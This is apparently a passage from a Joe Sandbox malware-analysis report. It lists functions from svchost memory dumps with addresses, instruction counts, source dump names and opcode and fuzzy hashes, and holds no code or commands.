                                                                                                                      Function 0307DBF9 Relevance: .2, Instructions: 244COMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 8549c86322cfe958a29a8ef1ef3c7120cca5d0c53e5cdecc8be8a9795373b755
                                                                                                                      • Instruction ID: 0d0033a06d34d755159429db4ec05bfd9f6290c5cfd4e435e8ce3f4337cf885f
                                                                                                                      • Opcode Fuzzy Hash: 8549c86322cfe958a29a8ef1ef3c7120cca5d0c53e5cdecc8be8a9795373b755
                                                                                                                      • Instruction Fuzzy Hash: 22915172A21A06CFD765CF2DC885766BBE0FF55324B188A18D4E6DB6A0C375E911CB04
                                                                                                                      Function 030FF7B0 Relevance: .2, Instructions: 242COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: e62a17b4fa4d11a460a4398f06cd4bb3aeef484526926727dbfdd31f856e6955
                                                                                                                      • Instruction ID: 0dfb45cc1e70212a57f472e779a03d15a3117308225551a5e65964fc6b63e504
                                                                                                                      • Opcode Fuzzy Hash: e62a17b4fa4d11a460a4398f06cd4bb3aeef484526926727dbfdd31f856e6955
                                                                                                                      • Instruction Fuzzy Hash: 66910572E05207AFDB54CF28C8807AAB7E5EF88310F188578EA55DB681D774E952CB90
                                                                                                                      Function 030FF43F Relevance: .2, Instructions: 241COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 1d6d1201b75a710dee00d70124d55f84bc64ea7d7088b814371f96ae37762702
                                                                                                                      • Instruction ID: 321d9567f28f000dcbfdc0a54f68165fe51829b7185210683a733f5e51f0c902
                                                                                                                      • Opcode Fuzzy Hash: 1d6d1201b75a710dee00d70124d55f84bc64ea7d7088b814371f96ae37762702
                                                                                                                      • Instruction Fuzzy Hash: A591E272A011159FCB18CF69C8906BEBBF1FF88310F1986B9D915DB795DA34E901CB50
                                                                                                                      Function 030F81CC Relevance: .2, Instructions: 232COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: b977df68cec1e72354baa23e8bf1f5fc25767aa0b2497e1d4d7bf5ec1202c41b
                                                                                                                      • Instruction ID: 5ec3c55d39e780dff86402d0b1daaa5ace230e997447f7c1264fce8a886554da
                                                                                                                      • Opcode Fuzzy Hash: b977df68cec1e72354baa23e8bf1f5fc25767aa0b2497e1d4d7bf5ec1202c41b
                                                                                                                      • Instruction Fuzzy Hash: E481F672E015199FCB54CF69C8805EEB7F5FF88310B18876ADA25E7A80D734E951CB90
                                                                                                                      Function 03040E59 Relevance: .2, Instructions: 231COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: ebd2ad1866ea02bd204d01ac2354c87b1f2cec99d1b0af6edf7f039379861b9d
                                                                                                                      • Instruction ID: 29685638beb9a134ffa75de87d0b273deea5590f8156aa8b75ed962f91f3b200
                                                                                                                      • Opcode Fuzzy Hash: ebd2ad1866ea02bd204d01ac2354c87b1f2cec99d1b0af6edf7f039379861b9d
                                                                                                                      • Instruction Fuzzy Hash: 1A81A771A01619DFDB54CE5AC8809AEFBF2FFC5210B28C2B5E914AB345D731EA41CB90
                                                                                                                      Function 030EE4F6 Relevance: .2, Instructions: 224COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 8da0c2e5b2dffaf9b88047e746dc872c66050d0fe574d3c21fa1a0495867874a
                                                                                                                      • Instruction ID: ecac3523c7088ff893ff6054a2b4cb01304683786b5c192d69deac98243f07e5
                                                                                                                      • Opcode Fuzzy Hash: 8da0c2e5b2dffaf9b88047e746dc872c66050d0fe574d3c21fa1a0495867874a
                                                                                                                      • Instruction Fuzzy Hash: 38816E76E012199FCB28CF99C5906ADFBF1EF89310F1981AAD816EF385D7349941CB90
                                                                                                                      Function 030FAB40 Relevance: .2, Instructions: 222COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                                                                      • Instruction ID: b8fddad4c3ee51c7c55ddfb800a893f06448cac4458cfdb3ce269bf0f4f8be61
                                                                                                                      • Opcode Fuzzy Hash: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                                                                      • Instruction Fuzzy Hash: 44816D35B112099FCF58DF98C890AAEB7F6AF84310F188569DA1A9B745DB34E901CF90
                                                                                                                      Function 0305D090 Relevance: .2, Instructions: 217COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 2f57846fa6853ce2eba42e0856427c3c37140fe7ac7bc1e87bfd5d4bd44f03bd
                                                                                                                      • Instruction ID: b5c45f6bd51d6dab502d98670d1584e0d3e1dd91f8d1275bb41889e1edfe7e63
                                                                                                                      • Opcode Fuzzy Hash: 2f57846fa6853ce2eba42e0856427c3c37140fe7ac7bc1e87bfd5d4bd44f03bd
                                                                                                                      • Instruction Fuzzy Hash: 45817A76E021199BEF14CF68C8807EEF7B2EB84344F19856BE816AB344D6319E40CB95
                                                                                                                      Function 0306E284 Relevance: .2, Instructions: 212COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 8f8aae12723d77986b1c546c72c513a2bdb6b2a799c269ea511a1172bb64ff90
                                                                                                                      • Instruction ID: 5f927cc196020d9924f1ac25be27af81e294bf155b3fff8e8c7c093d360cd6ac
                                                                                                                      • Opcode Fuzzy Hash: 8f8aae12723d77986b1c546c72c513a2bdb6b2a799c269ea511a1172bb64ff90
                                                                                                                      • Instruction Fuzzy Hash: 13818C75A01709AFDB25CFA9C980AEEF7FAFF88340F148429E556A7254D730AC05CB64
                                                                                                                      Function 0305B950 Relevance: .2, Instructions: 209COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: cae8b81e5f3b0e2f4ae39acc43dcbcb9197e04a08b8fe15e1faa34508b69bc33
                                                                                                                      • Instruction ID: aa28343e0d986fe75151ba581619a084a2dece1d2954fd842512f66f7cc7b926
                                                                                                                      • Opcode Fuzzy Hash: cae8b81e5f3b0e2f4ae39acc43dcbcb9197e04a08b8fe15e1faa34508b69bc33
                                                                                                                      • Instruction Fuzzy Hash: F271E4343067509EEB64CE2AC94077BB7E1AB85744F18895EFC968B5C4DB36F802DB60
                                                                                                                      Function 0304C640 Relevance: .2, Instructions: 206COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 0e39aecc1f16b8e1856ec7908216d9c57356517a7b94f1b92dbfd57f140e6b98
                                                                                                                      • Instruction ID: f28bf0fe1f67ce21e5b8b87b3e93514f3dfda6edbaf90c61f94fc20f9ab7e683
                                                                                                                      • Opcode Fuzzy Hash: 0e39aecc1f16b8e1856ec7908216d9c57356517a7b94f1b92dbfd57f140e6b98
                                                                                                                      • Instruction Fuzzy Hash: 3371CCB5C03265AFEB25CF59C9907BEBBB4FF59700F14856AE842AB350D7709940CBA0
                                                                                                                      Function 030EDAC6 Relevance: .2, Instructions: 202COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 4939549a5f3d9eeced78660b83cea57c782db9ec790fdcb0e70954036f8a9dbe
                                                                                                                      • Instruction ID: e6a0e4cc1e51f4809d574c7a74b4143af0968e4f448189e0f11414e81b444232
                                                                                                                      • Opcode Fuzzy Hash: 4939549a5f3d9eeced78660b83cea57c782db9ec790fdcb0e70954036f8a9dbe
                                                                                                                      • Instruction Fuzzy Hash: 3E81AD70E052A6DFCB24CF6AC441AAAFBF1EF49740F04889AE495AB285D374D841DF50
                                                                                                                      Function 030F70E9 Relevance: .2, Instructions: 201COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 4c68d84f49fe25dccab7f91731f38269edba46cb144b2fb6f803c0900bfea210
                                                                                                                      • Instruction ID: e8d04360c4c0430be43fc46615b952ea40ca613701302fd1a211ab061b41f998
                                                                                                                      • Opcode Fuzzy Hash: 4c68d84f49fe25dccab7f91731f38269edba46cb144b2fb6f803c0900bfea210
                                                                                                                      • Instruction Fuzzy Hash: D561F975E023169FCB54EEA9C8809FFB7BDBF84A40F044439EA119BA40DB70D9458B92
                                                                                                                      Function 0304260B Relevance: .2, Instructions: 201COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: f5cc47595186c17a5a26ec5acae05db6b4bc981e0130bc107dba778d42556537
                                                                                                                      • Instruction ID: 7d0af11ca2ce390e0551700a2f48fe748cd93fb9e41a1e2392afeb26e48622c4
                                                                                                                      • Opcode Fuzzy Hash: f5cc47595186c17a5a26ec5acae05db6b4bc981e0130bc107dba778d42556537
                                                                                                                      • Instruction Fuzzy Hash: 8D71CEB57066419FD351DF28C480B6AB7E9FF88310F0989BAF8988B351DB34D945CB91
                                                                                                                      Function 030EF0CC Relevance: .2, Instructions: 199COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: d74a2be646ea590907ce2ce4ac8db71aa24c8c7b1917204384765a0c8280fad4
                                                                                                                      • Instruction ID: 4a4de8275d73764f9dec39fcca5e66e56b3e577fbd8f482e97b36d0f350cfe81
                                                                                                                      • Opcode Fuzzy Hash: d74a2be646ea590907ce2ce4ac8db71aa24c8c7b1917204384765a0c8280fad4
                                                                                                                      • Instruction Fuzzy Hash: 2F717D79B02627DFCB68CF5AC08017AF3F1BF84705B6A48AED85297640D774E991CB60
                                                                                                                      Function 030B035C Relevance: .2, Instructions: 198COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                                                                      • Instruction ID: 3aa48a03fe0c5de62181e58d39646de864c1226a4d64f55876d5a260b9e4dbf1
                                                                                                                      • Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                                                                      • Instruction Fuzzy Hash: 27716DB5E01619AFCB10DFA9C984ADFBBB8FF88700F144569E505AB650DB34EA41CB90
                                                                                                                      Function 030C62A0 Relevance: .2, Instructions: 198COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 3e6fb7be9b1390fe62d7e2bfcddfeeec8ba402bb3ffc34c2ad2d7c2990f49c97
                                                                                                                      • Instruction ID: b67bc7a284052e727d1d5f4a36d22eb8ccbd0e284aa6ed96934b3ce2fcb3d2c8
                                                                                                                      • Opcode Fuzzy Hash: 3e6fb7be9b1390fe62d7e2bfcddfeeec8ba402bb3ffc34c2ad2d7c2990f49c97
                                                                                                                      • Instruction Fuzzy Hash: 57710136212B48AFD731DF14C844FAEB7E9EF84720F18492CE2568B6A0D776E944CB54
                                                                                                                      Function 030F7A46 Relevance: .2, Instructions: 193COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 03f8f6e9de6850fa956c575d60eae68d9587248525660f763705c68f4d98b686
                                                                                                                      • Instruction ID: 5b6159ad1dc813daf23bcf21033665caf6d26112b522d3f9870c3a63ee3b0422
                                                                                                                      • Opcode Fuzzy Hash: 03f8f6e9de6850fa956c575d60eae68d9587248525660f763705c68f4d98b686
                                                                                                                      • Instruction Fuzzy Hash: F8516975A012295FCB18DF69C880ABEB7E6EFC8750F184169EA50DB780DA34C902C7A0
                                                                                                                      Function 030F132D Relevance: .2, Instructions: 188COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 8d75124e2b8701f51f5dae9a863607142ab3535aa540f1b15ccf96d4cd20ba17
                                                                                                                      • Instruction ID: e50a9d45b9d6d4acbc6266ffc2c89d2e23ecb559f6965a7858ce05a5fa74c66f
                                                                                                                      • Opcode Fuzzy Hash: 8d75124e2b8701f51f5dae9a863607142ab3535aa540f1b15ccf96d4cd20ba17
                                                                                                                      • Instruction Fuzzy Hash: C4819175A01205DFCB09CF99C490AAEB7F1FF88300F1981A9D859EB745D734EA51CBA0
                                                                                                                      Function 030F903E Relevance: .2, Instructions: 186COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 5889e134cabd421848c8a073f8a8c211a8af8e43c48f2801905791e00cd8f07f
                                                                                                                      • Instruction ID: 511bb96c3b9795cfdfa52b1397a406fc34fc57d072c762c7369160001a9dcd73
                                                                                                                      • Opcode Fuzzy Hash: 5889e134cabd421848c8a073f8a8c211a8af8e43c48f2801905791e00cd8f07f
                                                                                                                      • Instruction Fuzzy Hash: 6361E075602715AFD395DF68C884BEBBBE8FF88300F048629FA5887A40DB30E510CB91
                                                                                                                      Function 030FFCF2 Relevance: .2, Instructions: 181COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 0cf183d7469ec1224c9e04b61a4ff5f4a41b7bde11582c75d7465f1447cb395c
                                                                                                                      • Instruction ID: d53bfece4122b8d14cd57bd39665abe680e7b61f510f87f2a7a2e339bcd6be26
                                                                                                                      • Opcode Fuzzy Hash: 0cf183d7469ec1224c9e04b61a4ff5f4a41b7bde11582c75d7465f1447cb395c
                                                                                                                      • Instruction Fuzzy Hash: F961B071A0120BAFCB14DF68C880BBEB7F5FF88314F248969E615EB685D730A955CB50
                                                                                                                      Function 03037703 Relevance: .2, Instructions: 179COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: f721d83b370ce407925e0b89eecdb6a619296e95cd2ddb63691200f89ce916ea
                                                                                                                      • Instruction ID: b4950fcc0fea99eed6825c0091e2c758d5ac0255c7bd69639e1aa3c774d26784
                                                                                                                      • Opcode Fuzzy Hash: f721d83b370ce407925e0b89eecdb6a619296e95cd2ddb63691200f89ce916ea
                                                                                                                      • Instruction Fuzzy Hash: 516143B5A01606EFDB58DF68C480AADFBF9FF89600F18856AD519A7340DB30A951CBD0
                                                                                                                      Function 030F92A6 Relevance: .2, Instructions: 174COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: d867114a9f0bc5dc6947f57ce01067aee2727053087729fec35949b382f75545
                                                                                                                      • Instruction ID: c0831ccc48da14544a45a5929b88f47fb68341a5d8cb46bac9911fb577f08960
                                                                                                                      • Opcode Fuzzy Hash: d867114a9f0bc5dc6947f57ce01067aee2727053087729fec35949b382f75545
                                                                                                                      • Instruction Fuzzy Hash: 836138356067428FD351CF64C494BAAF7E0FF90304F1C486DEA858BA91DB75E806CB81
                                                                                                                      Function 030FCE93 Relevance: .2, Instructions: 172COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: adaef8c90542e90ae6fae2448e28977f4ff712f71b9da8e8631f75b3b546fe51
                                                                                                                      • Instruction ID: 3eac2480614a85d71ad68f1e2321508fe0b67bce101aad4ae885a5db9b4ecb8e
                                                                                                                      • Opcode Fuzzy Hash: adaef8c90542e90ae6fae2448e28977f4ff712f71b9da8e8631f75b3b546fe51
                                                                                                                      • Instruction Fuzzy Hash: 0551483260630A8FE714DE2C88527ABF7D6AFC1250F1D887DEA56CB649DB30D909C791
                                                                                                                      Function 0266FC73 Relevance: .2, Instructions: 165COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1963743549.0000000002660000.00000040.80000000.00040000.00000000.sdmp, Offset: 02660000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_2660000_svchost.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: baad548f5feed02f012b2fc10accbe050e72558d66b692510d210734a80849a9
                                                                                                                      • Instruction ID: 036b8e726111254a76be11653282252c2d5bd6bbfb09713d2b0d755f40056269
                                                                                                                      • Opcode Fuzzy Hash: baad548f5feed02f012b2fc10accbe050e72558d66b692510d210734a80849a9
                                                                                                                      • Instruction Fuzzy Hash: 285161B3E14A214BD3188E09CC40635B792FFD8312B5F81BEDD1A9B357CA74E9529A90
                                                                                                                      Function 0302B2D3 Relevance: .2, Instructions: 161COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 0c0374915bceaddb469843fccb61de85380ddc5ade7faed4426d2d3e679869ea
                                                                                                                      • Instruction ID: 2b53d841c5ac328135257eb526c37482cc3db0d83521beee7f0d65a10d09a6ac
                                                                                                                      • Opcode Fuzzy Hash: 0c0374915bceaddb469843fccb61de85380ddc5ade7faed4426d2d3e679869ea
                                                                                                                      • Instruction Fuzzy Hash: F3415775202710AFD725EF29D880B6ABBE9FF84710F144869E5599B350D770DC50CBA0
                                                                                                                      Function 030F7D73 Relevance: .2, Instructions: 160COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 933ff0d61e98b2325fbdc9a2e057a38880d7fe25c27d826d14492b3674c7d7f2
                                                                                                                      • Instruction ID: 4ec04ff747767521172b5acba06e9b6e5e2f5be5284170fab12134c102e869eb
                                                                                                                      • Opcode Fuzzy Hash: 933ff0d61e98b2325fbdc9a2e057a38880d7fe25c27d826d14492b3674c7d7f2
                                                                                                                      • Instruction Fuzzy Hash: 5451C136A1014A8FCB08CF68C480AEEB7F1EF98314B19827AD915DB355E734DA15CB90
                                                                                                                      Function 03043740 Relevance: .2, Instructions: 159COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: c89112f900db62a8ba05ef05b051eb1b8b594ae668ae5ad77ff338e79d9bc6c1
                                                                                                                      • Instruction ID: a27ef3e439f2fed6fe1bb125d4e929e49d4e07c125864cf03e60d5d2dd11cd03
                                                                                                                      • Opcode Fuzzy Hash: c89112f900db62a8ba05ef05b051eb1b8b594ae668ae5ad77ff338e79d9bc6c1
                                                                                                                      • Instruction Fuzzy Hash: BE5113B9A02616AFC721CF68C4806A9F7B4FF44310F0855B9E845DB740D734EAA1CBC0
                                                                                                                      Function 03037152 Relevance: .2, Instructions: 158COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: b4abcb59eddbc1af42f49115dd09901bb1299d6a978a060d7579be9ed6223f2b
                                                                                                                      • Instruction ID: 024790389662b840e16fa2136336f4ff3493df3b6add9b87ec40d24eb74993b6
                                                                                                                      • Opcode Fuzzy Hash: b4abcb59eddbc1af42f49115dd09901bb1299d6a978a060d7579be9ed6223f2b
